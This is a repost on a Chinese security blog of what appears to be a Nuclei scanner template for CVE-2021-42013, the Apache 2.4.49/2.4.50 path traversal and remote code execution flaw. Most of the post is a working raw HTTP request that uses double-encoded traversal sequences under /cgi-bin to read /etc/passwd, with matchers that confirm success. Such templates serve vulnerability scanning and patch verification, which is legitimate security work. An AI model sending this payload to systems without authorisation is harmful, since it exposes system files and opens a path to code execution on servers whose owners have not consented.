怕怕奇RCE屁噢c

admin 2021年12月17日21:49:31评论100 views字数 1242阅读4分8秒阅读模式


怕怕奇 RCE 屁噢c


怕怕奇 RCE 屁噢c


id: CVE-2021-42013
info: name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution author: nvn1729 severity: critical description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. reference: - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - https://twitter.com/itsecurityco/status/1446136957117943815 tags: cve,cve2021,lfi,apache,rce,misconfig
requests: - raw: - |+ GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} unsafe: true matchers-condition: and matchers:
- type: regex regex: - "root:.*:0:0"
- type: status status: - 200


原文始发于微信公众号(Khan安全攻防实验室):怕怕奇 RCE 屁噢c

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月17日21:49:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   怕怕奇RCE屁噢chttps://cn-sec.com/archives/569580.html

发表评论

匿名网友 填写信息